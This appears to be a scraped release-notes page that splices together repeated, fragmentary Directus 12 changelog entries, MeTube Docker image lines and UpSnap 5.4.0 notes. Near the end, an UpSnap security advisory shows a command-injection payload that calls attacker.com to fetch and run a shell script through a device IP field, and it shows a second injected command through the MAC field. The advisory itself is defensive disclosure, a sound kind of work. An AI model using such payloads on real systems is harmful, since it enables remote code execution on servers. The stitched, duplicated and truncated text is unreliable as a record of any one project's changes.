Log in
@directus/app@16.1.1@directus/api@36.0.2create-directus-extension@12.1.0
@directus/app@16.1.0@directus/api@36.0.1
License Enforcement
Note
Directus is free for individuals and organizations under $5M annual revenue and 50 employees.
Get your free license key at directus.com/oig
Directus 12 introduces active license enforcement. Self-hosted instances run on the Core tier by default. Higher limits and additional features require a valid license. See Licensing for a complete overview.
This change affects instances previously using features that now require a license, including:
Enforcement is immediate on new instances. Instances upgrading to Directus 12 get a 30-day grace period from the time of upgrade, after which these are enforced unless a license that enables them is configured.
If your instance uses any of these features, add a license that includes them to continue to do so. If your instance uses only Core tier features, no action is required.
Changed license to MSCL-1.0-GPL (#27417)
Changed the default of IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607)
IP_TRUST_PROXY default was changed from true to false. If you run Directus behind a reverse proxy and rely on X-Forwarded-For (or similar) headers for client IP resolution, you must now explicitly set IP_TRUST_PROXY to true or a more specific trust configuration.Fixed health check results not being shared in multi-instance settings. Restricted /server/health to authenticated users (#27160)
/server/health will return 404 for unauthenticated requests, use /server/ping for liveness checkscache, rateLimiter and rateLimiterGlobal health checks have been replaced by a generic redis check using the redis: prefixIntroduced VERSION_KEY_ constants and renamed main to published @alvarosabu (#27397)*
?version=published to resolve versions of the main item(s) via the version query parameter. For backward compatibility, ?version=main will continue to work.Replaced status field with archived boolean in collection settings @alvarosabu (#27397)
Deprecated the VResizeable component @formfcw (#27437)
VResizeable component has been deprecated. Extension authors using <v-resizeable> should migrate to @directus/vue-split-panel or their own implementation.Updated type system, borders, and theme variables @formfcw (#27437)
Updated module navigation bar spacing and styling @HZooly (#27437)
navigation.project.borderColor / navigation.project.borderWidth / navigation.project.background from theming. No action is required β these props will simply no longer have any effect.Locked published items in versioned collections from editing and added a header action button to edit in the draft version @alvarosabu (#27397)
Removed rounded buttons and adopted shared header action button across all views @formfcw (#27437)
rounded prop has been removed from v-button. Extensions using rounded will still render correctly but buttons will appear as rounded rectangles instead of circles. No functional impact.Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437)
navigation.background, navigation.backgroundAccent, navigation.borderWidth, navigation.borderColor, header.background, header.borderWidth, and header.borderColor have been removed and replaced by shell.background, shell.backgroundAccent, shell.borderWidth, and shell.borderColor.shell scope. The corresponding CSS variables change from --theme--navigation--background, --theme--navigation--background-accent, --theme--navigation--border-*, --theme--header--background, and --theme--header--border-* to --theme--shell--background, --theme--shell--background-accent, and --theme--shell--border-*.Removed the extra confirmation step from the publish flow @alvarosabu (#27487)
Updated sidebar styles @formfcw (#27437)
section.toggle.borderWidth / section.toggle.borderColor in favor of section-level border tokens. No action is required β these props will simply no longer have any effect.sidebarShadow and headerShadow from defineLayout(). No action is required β these props will simply no longer have any effect.Refactored focus ring from border/box-shadow to outline @formfcw (#27437)
Updated header bar elements and deprecated the headline slot @formfcw (#27437)
Deprecation for extensions: The headline slot on the private view header bar has been deprecated. Existing content keeps rendering, but consumers using <template #headline> will now see a deprecation hint from Volar.
@directus/app
@directus/api
/server/health to authenticated users (#27160 by @ComfortablyCoding)@directus/themes
Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)
Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)
Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)
:::notice
v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering β actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.:::
@directus/types
Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)
Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)
Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)
:::notice
v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering β actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.:::
@directus/extensions
@directus/extensions-registry
@directus/extensions-sdk
@directus/format-title
@directus/memory
@directus/pressure
@directus/release-notes-generator
@directus/update-check
@directus/validation
@directus/schema
@directus/schema-builder
@directus/specs
@directus/storage
@directus/storage-driver-cloudinary
@directus/storage-driver-supabase
@directus/storage-driver-azure
@directus/storage-driver-gcs
@directus/storage-driver-local
@directus/storage-driver-s3
@directus/stores
create-directus-extension
create-directus-project
@directus/env
IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607 by @br41nslug)@directus/sdk
Fixed the outdated updateExtension command and added missing deleteExtension and extension registry commands (#27314 by @kheiner)
::notice
updateExtension now accepts an id instead of bundle and nameRefactor sdk error to use class over object (#27417 by @ComfortablyCoding)
:::warning
Requests that fail will now throw a RequestError instead of returning a response with an error property.
:::
Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)
Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
Fixed Image Editor save button to use split button @HZooly (#27437 by @formfcw)
Added split-menu slot to v-button and migrate primary header actions @formfcw (#27437 by @formfcw)
Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
Added version support to getItemRoute and update all callers to preserve version context when navigating to items from layouts and interfaces @alvarosabu (#27397 by @formfcw)
Added behavior to auto-switch to the draft version on the first edit of published item @alvarosabu (#27507 by @alvarosabu)
Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)
Updated Visual Editor header bar buttons @formfcw (#27437 by @formfcw)
Updated content route middleware to handle singleton collections and draft flow via route guards @alvarosabu (#27397 by @formfcw)
Replaced status field with archived boolean in collection settings @alvarosabu (#27397 by @formfcw)
Updated module bar buttons style @HZooly (#27437 by @formfcw)
Deprecated the VResizeable component @formfcw (#27437 by @formfcw)
Updated VChip component to appear as a pill in form field label, group accordion, group tabs, kanban, deployment status, extension item, marketplace extension list item, marketplace extension banner, and user popover @formfcw (#27462 by @formfcw)
Added tresjs shader background for public pages @alvarosabu (#27428 by @alvarosabu)
Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
Rendered non-clickable version menu without directus_versions read access @alvarosabu (#27461 by @alvarosabu)
Added item-less draft creation flow for versioned collections @alvarosabu (#27397 by @formfcw)
Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)
Updated Visual Editor popover/modal action buttons @formfcw (#27437 by @formfcw)
Updated UI for the Draft & Publish workflow @formfcw (#27437 by @formfcw)
Updated mobile appearance of drawer sidebar @formfcw (#27437 by @formfcw)
Moved Promote/Publish button to header actions @alvarosabu (#27397 by @formfcw)
Updated primary header actions to show label and replace outlined header action buttons @formfcw (#27437 by @formfcw)
Updated SearchInput component to match the new design @formfcw (#27437 by @formfcw)
Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
Refactored header bar action slots and reorganized CTAs @formfcw (#27437 by @formfcw)
:::notice
actions:append slot in the header bar has been deprecated in favor of the new actions:primary slot for primary CTAs. Existing actions:append usage keeps rendering in the secondary-actions zone, but consumers will now see a deprecation hint from Volar.:::
Added navigation logic on discarding item-less versions @alvarosabu (#27397 by @formfcw)
Put the sidebar into the content area @HZooly (#27437 by @formfcw)
Updated color system for VChip and VersionMenu components @formfcw (#27437 by @formfcw)
Updated content section spacing and drawer content spacing @HZooly (#27437 by @formfcw)
Extracted the card subheader into a reusable subheader component @HZooly (#27437 by @formfcw)
Added version select to collection page @alvarosabu (#27397 by @formfcw)
Renamed "Promote" to "Publish" in version menu and disabled create version and published selection for item-less versions @alvarosabu (#27397 by @formfcw)
Added version query param guards on content-item route @alvarosabu (#27397 by @formfcw)
Forwarded theme tokens and i18n strings from Studio to the visual-editing iframe @formfcw (#27469 by @formfcw)
Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)
Introduced VersionChip component @formfcw (#27437 by @formfcw)
Updated theme preview component to match the new design @formfcw (#27437 by @formfcw)
Updated collab avatar indicator design @formfcw (#27437 by @formfcw)
Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)
:::notice
v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering β actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.:::
Updated header bar elements and deprecated the headline slot @formfcw (#27437 by @formfcw)
Ensured to switch to the draft version when visually editing an item of a versioned collection @formfcw (#27595 by @formfcw)
Extracted reusable ModuleBarButton component @formfcw (#27437 by @formfcw)
Moved client-validation to promote version workflow instead of save version @alvarosabu (#27397 by @formfcw)
Added Create New action to publish split menu with shortcut @alvarosabu (#27425 by @alvarosabu)
MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)version query parameter in collections @Nitwel (#27397 by @formfcw)MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)directus_oauth_* system collection visibility to match other system collections (#27682 by @hanneskuettner)MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)version query parameter in collections @Nitwel (#27397 by @formfcw)/server/health to authenticated users (#27160 by @ComfortablyCoding)MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)vue-tsc to 3.1.8 (#27437 by @formfcw)EXTENSIONS_PATH and EXTENSIONS_LOCATION env vars not being respected by the Vite dev server (#27642 by @HZooly)directus_oauth_* system collections (#27682 by @hanneskuettner)$t: keys on sub-field labels, and added a "Field Name Translations" section to the sub-field configuration UI (#27374 by @khanahmad4527)$t: prefix and translation strings, matching the field/collection label pattern. The flow name input in the flow editor now exposes the translation picker. (#27472 by @khanahmad4527)deep query parameters being dropped when filters use dynamic variables (#27676 by @mazen-salah)SECRET is missing. (#27406 by @rijkvanzanten)provider when not entitled to SSO (#27675 by @ComfortablyCoding)isMinimumAppPermission function (#27662 by @ComfortablyCoding)DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)/server/health to authenticated users (#27160 by @ComfortablyCoding)SingletonCollections incorrectly including core schema collections (#27196 by @kheiner)@directus/app@16.0.0@directus/api@36.0.0@directus/ai@1.3.2@directus/composables@11.5.0@directus/constants@14.4.0create-directus-extension@12.0.0create-directus-project@13.0.0@directus/env@6.0.0@directus/errors@2.4.0@directus/extensions@4.0.0@directus/extensions-registry@4.0.0@directus/extensions-sdk@18.0.0@directus/format-title@13.0.0@directus/memory@4.0.0@directus/pressure@4.0.0@directus/release-notes-generator@3.0.0@directus/schema@14.0.0@directus/schema-builder@1.0.0@directus/specs@14.0.0@directus/storage@13.0.0@directus/storage-driver-azure@13.0.0@directus/storage-driver-cloudinary@13.0.0@directus/storage-driver-gcs@13.0.0@directus/storage-driver-local@13.0.0@directus/storage-driver-s3@13.0.0@directus/storage-driver-supabase@4.0.0@directus/stores@3.0.0@directus/system-data@4.5.0@directus/themes@2.0.0@directus/types@16.0.0@directus/update-check@14.0.0@directus/utils@13.5.0@directus/validation@3.0.0@directus/visual-editing@2.1.0@directus/sdk@22.0.0
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.06.10GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.06.10
Fixed health check results not being shared in multi-instance settings. Restricted /server/health to authenticated users (#27160)
Health checks are cached by default and shared across multi-instance deployments
/server/health will return 404 for unauthenticated requests, use /server/ping for liveness checks
cache, rateLimiter and rateLimiterGlobal health checks have been replaced by a generic redis check using the redis: prefix
@directus/api
/server/health to authenticated users (#27160 by @ComfortablyCoding)/server/health to authenticated users (#27160 by @ComfortablyCoding)directus_oauth_* system collection visibility to match other system collections (#27682 by @hanneskuettner)EXTENSIONS_PATH and EXTENSIONS_LOCATION env vars not being respected by the Vite dev server (#27642 by @HZooly)directus_oauth_* system collections (#27682 by @hanneskuettner)$t: prefix and translation strings, matching the field/collection label pattern. The flow name input in the flow editor now exposes the translation picker. (#27472 by @khanahmad4527)deep query parameters being dropped when filters use dynamic variables (#27676 by @mazen-salah)provider when not entitled to SSO (#27675 by @ComfortablyCoding)/server/health to authenticated users (#27160 by @ComfortablyCoding)SingletonCollections incorrectly including core schema collections (#27196 by @kheiner)@directus/app@16.0.0-rc.1@directus/api@36.0.0-rc.1@directus/composables@11.5.0-rc.1@directus/constants@14.4.0-rc.1create-directus-extension@12.0.0-rc.1@directus/env@6.0.0-rc.1@directus/extensions@4.0.0-rc.1@directus/extensions-registry@4.0.0-rc.1@directus/extensions-sdk@18.0.0-rc.1@directus/memory@4.0.0-rc.1@directus/pressure@4.0.0-rc.1@directus/schema-builder@1.0.0-rc.1@directus/storage-driver-azure@13.0.0-rc.1@directus/storage-driver-cloudinary@13.0.0-rc.1@directus/storage-driver-gcs@13.0.0-rc.1@directus/storage-driver-s3@13.0.0-rc.1@directus/storage-driver-supabase@4.0.0-rc.1@directus/system-data@4.5.0-rc.1@directus/themes@2.0.0-rc.1@directus/types@16.0.0-rc.1@directus/utils@13.5.0-rc.1@directus/validation@3.0.0-rc.1@directus/sdk@22.0.0-rc.1
Note
If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.
The official and only trusted source for UpSnap is this repository (and its linked releases).
Do not pay third parties for something that is provided here for free.
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.05.30GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.05.30
Introduced VERSION_KEY_ constants and renamed main to published @alvarosabu (#27397)*
Backward Compatibility: You can now use ?version=published to resolve versions of the main item(s) via the version query parameter. For backward compatibility, ?version=main will continue to work.
Replaced status field with archived boolean in collection settings @alvarosabu (#27397)
Backward Compatibility: Existing collections with string-based status fields continue to work unchanged; newly created collections now default to a boolean "Archived" field instead of the string "Status" field
Deprecated the VResizeable component @formfcw (#27437)
VResizeable component has been deprecated. Extension authors using <v-resizeable> should migrate to @directus/vue-split-panel or their own implementation.Updated type system, borders, and theme variables @formfcw (#27437)
Updated module navigation bar spacing and styling @HZooly (#27437)
navigation.project.borderColor / navigation.project.borderWidth / navigation.project.background from theming. No action is required β these props will simply no longer have any effect.Locked published items in versioned collections from editing and added a header action button to edit in the draft version @alvarosabu (#27397)
Removed rounded buttons and adopted shared header action button across all views @formfcw (#27437)
rounded prop has been removed from v-button. Extensions using rounded will still render correctly but buttons will appear as rounded rectangles instead of circles. No functional impact.Changed license to MSCL-1.0-GPL (#27417)
Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437)
navigation.background, navigation.backgroundAccent, navigation.borderWidth, navigation.borderColor, header.background, header.borderWidth, and header.borderColor have been removed and replaced by shell.background, shell.backgroundAccent, shell.borderWidth, and shell.borderColor.shell scope. The corresponding CSS variables change from --theme--navigation--background, --theme--navigation--background-accent, --theme--navigation--border-*, --theme--header--background, and --theme--header--border-* to --theme--shell--background, --theme--shell--background-accent, and --theme--shell--border-*.Removed the extra confirmation step from the publish flow @alvarosabu (#27487)
Updated sidebar styles @formfcw (#27437)
section.toggle.borderWidth / section.toggle.borderColor in favor of section-level border tokens. No action is required β these props will simply no longer have any effect.sidebarShadow and headerShadow from defineLayout(). No action is required β these props will simply no longer have any effect.Refactored focus ring from border/box-shadow to outline @formfcw (#27437)
Updated header bar elements and deprecated the headline slot @formfcw (#27437)
headline slot on the private view header bar has been deprecated. Existing content keeps rendering, but consumers using <template #headline> will now see a deprecation hint from Volar.Changed the default of IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607)
The IP_TRUST_PROXY default was changed from true to false. If you run Directus behind a reverse proxy and rely on X-Forwarded-For (or similar) headers for client IP resolution, you must now explicitly set IP_TRUST_PROXY to true or a more specific trust configuration.
Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)
Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)
Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)
:::notice
v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering β actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.:::
Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)
Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)
Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)
:::notice
v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering β actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.:::
IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607 by @br41nslug)Refactor sdk error to use class over object (#27417 by @ComfortablyCoding)
:::warning
Requests that fail will now throw a RequestError instead of returning a response with an error property.
:::
Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)
Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
Fixed Image Editor save button to use split button @HZooly (#27437 by @formfcw)
Added split-menu slot to v-button and migrate primary header actions @formfcw (#27437 by @formfcw)
Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
Added version support to getItemRoute and update all callers to preserve version context when navigating to items from layouts and interfaces @alvarosabu (#27397 by @formfcw)
Added behavior to auto-switch to the draft version on the first edit of published item @alvarosabu (#27507 by @alvarosabu)
Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)
Updated Visual Editor header bar buttons @formfcw (#27437 by @formfcw)
Updated content route middleware to handle singleton collections and draft flow via route guards @alvarosabu (#27397 by @formfcw)
Replaced status field with archived boolean in collection settings @alvarosabu (#27397 by @formfcw)
Updated module bar buttons style @HZooly (#27437 by @formfcw)
Deprecated the VResizeable component @formfcw (#27437 by @formfcw)
Updated VChip component to appear as a pill in form field label, group accordion, group tabs, kanban, deployment status, extension item, marketplace extension list item, marketplace extension banner, and user popover @formfcw (#27462 by @formfcw)
Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
Rendered non-clickable version menu without directus_versions read access @alvarosabu (#27461 by @alvarosabu)
Added item-less draft creation flow for versioned collections @alvarosabu (#27397 by @formfcw)
Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)
Updated Visual Editor popover/modal action buttons @formfcw (#27437 by @formfcw)
Updated UI for the Draft & Publish workflow @formfcw (#27437 by @formfcw)
Updated mobile appearance of drawer sidebar @formfcw (#27437 by @formfcw)
Moved Promote/Publish button to header actions @alvarosabu (#27397 by @formfcw)
Updated primary header actions to show label and replace outlined header action buttons @formfcw (#27437 by @formfcw)
Updated SearchInput component to match the new design @formfcw (#27437 by @formfcw)
Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
Refactored header bar action slots and reorganized CTAs @formfcw (#27437 by @formfcw)
:::notice
actions:append slot in the header bar has been deprecated in favor of the new actions:primary slot for primary CTAs. Existing actions:append usage keeps rendering in the secondary-actions zone, but consumers will now see a deprecation hint from Volar.:::
Added navigation logic on discarding item-less versions @alvarosabu (#27397 by @formfcw)
Put the sidebar into the content area @HZooly (#27437 by @formfcw)
Updated color system for VChip and VersionMenu components @formfcw (#27437 by @formfcw)
Updated content section spacing and drawer content spacing @HZooly (#27437 by @formfcw)
Extracted the card subheader into a reusable subheader component @HZooly (#27437 by @formfcw)
Added version select to collection page @alvarosabu (#27397 by @formfcw)
Renamed "Promote" to "Publish" in version menu and disabled create version and published selection for item-less versions @alvarosabu (#27397 by @formfcw)
Added version query param guards on content-item route @alvarosabu (#27397 by @formfcw)
Forwarded theme tokens and i18n strings from Studio to the visual-editing iframe @formfcw (#27469 by @formfcw)
Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)
Introduced VersionChip component @formfcw (#27437 by @formfcw)
Updated theme preview component to match the new design @formfcw (#27437 by @formfcw)
Updated collab avatar indicator design @formfcw (#27437 by @formfcw)
Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)
:::notice
v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering β actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.:::
Updated header bar elements and deprecated the headline slot @formfcw (#27437 by @formfcw)
Ensured to switch to the draft version when visually editing an item of a versioned collection @formfcw (#27595 by @formfcw)
Extracted reusable ModuleBarButton component @formfcw (#27437 by @formfcw)
Moved client-validation to promote version workflow instead of save version @alvarosabu (#27397 by @formfcw)
Added Create New action to publish split menu with shortcut @alvarosabu (#27425 by @alvarosabu)
MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)version query parameter in collections @Nitwel (#27397 by @formfcw)MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)version query parameter in collections @Nitwel (#27397 by @formfcw)MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)vue-tsc to 3.1.8 (#27437 by @formfcw)$t: keys on sub-field labels, and added a "Field Name Translations" section to the sub-field configuration UI (#27374 by @khanahmad4527)SECRET is missing. (#27406 by @rijkvanzanten)DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)@directus/app@16.0.0-rc.0@directus/api@36.0.0-rc.0@directus/ai@1.3.2-rc.0@directus/composables@11.5.0-rc.0@directus/constants@14.4.0-rc.0create-directus-extension@12.0.0-rc.0create-directus-project@13.0.0-rc.0@directus/env@6.0.0-rc.0@directus/errors@2.4.0-rc.0@directus/extensions@4.0.0-rc.0@directus/extensions-registry@4.0.0-rc.0@directus/extensions-sdk@18.0.0-rc.0@directus/format-title@13.0.0-rc.0@directus/memory@4.0.0-rc.0@directus/pressure@4.0.0-rc.0@directus/release-notes-generator@3.0.0-rc.0@directus/schema@14.0.0-rc.0@directus/schema-builder@1.0.0-rc.0@directus/specs@14.0.0-rc.0@directus/storage@13.0.0-rc.0@directus/storage-driver-azure@13.0.0-rc.0@directus/storage-driver-cloudinary@13.0.0-rc.0@directus/storage-driver-gcs@13.0.0-rc.0@directus/storage-driver-local@13.0.0-rc.0@directus/storage-driver-s3@13.0.0-rc.0@directus/storage-driver-supabase@4.0.0-rc.0@directus/stores@3.0.0-rc.0@directus/system-data@4.5.0-rc.0@directus/themes@2.0.0-rc.0@directus/types@16.0.0-rc.0@directus/update-check@14.0.0-rc.0@directus/utils@13.5.0-rc.0@directus/validation@3.0.0-rc.0@directus/visual-editing@2.1.0-rc.0@directus/sdk@22.0.0-rc.0
Docker images have been built and pushed:
Docker Hub:
alexta69/metube:latestalexta69/metube:2026.05.29GitHub Container Registry:
ghcr.io/alexta69/metube:latestghcr.io/alexta69/metube:2026.05.29
Note
If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.
The official and only trusted source for UpSnap is this repository (and its linked releases).
Do not pay third parties for something that is provided here for free.
The initial setup process has been changed. Instead of a built-in multi-step wizard, UpSnap now directs you to create your first superuser account via the server console logs, which contain a one-time setup link generated by PocketBase.
Once you've created the superuser using that link, return to the UpSnap welcome page and click Done to continue.
In versions prior to 5.4.0, the setup wizard allowed anyone with network access to register the first superuser account if they reached the setup page before the legitimate administrator. This meant that on a publicly reachable instance, an attacker could take ownership of the application before the real admin had a chance to complete the setup.
By moving account creation out-of-band to the server console, only someone with access to the server logs (i.e. the administrator) can complete the initial setup.
Note
If you have sucessfully completed the initial setup in the past you are not affected.
UpSnap allows setting custom shell commands for waking and shutting down devices. These commands support {{ DEVICE_IP }} and {{ DEVICE_MAC }} placeholders, which are replaced with the device's actual IP and MAC values before being executed on the server.
In versions prior to 5.4.0, these values were only changed by removing spaces before being substituted into the shell command. An attacker with permission to edit a device could set a malicious IP or MAC field, for example:
IP: 127.0.0.1;curl${IFS}http://attacker.com/shell.sh|sh
MAC: 00:00:00:00:00:00&&id
When the device was woken or shut down, the injected commands would execute on the server with the same privileges as UpSnap itself.
Backend: Before substituting {{ DEVICE_IP }} and {{ DEVICE_MAC }} into any shell command, UpSnap additionally validates both values using Go's standard net.ParseIP and net.ParseMAC. If a value somehow reaches this point in an invalid state, the command is rejected and an error is returned instead of executing.
Database: A new migration adds regex constraints to the ip and mac fields in the PocketBase schema (^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}$ for IP, ^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$ for MAC). Any write that bypasses the UI is rejected at the database level.
HTML input: The IP and MAC fields in the device form now have pattern attributes that enforce valid formats directly in the browser, preventing malformed values from being submitted in the first place.
Any instance where untrusted users had permission to create or edit devices. Users who are the sole administrator of their own instance and have not shared device-edit access are at lower risk.
Note
If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.
The official and only trusted source for UpSnap is this repository (and its linked releases).
Do not pay third parties for something that is provided here for free.
Note
If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.
The official and only trusted source for UpSnap is this repository (and its linked releases).
Do not pay third parties for something that is provided here for free.
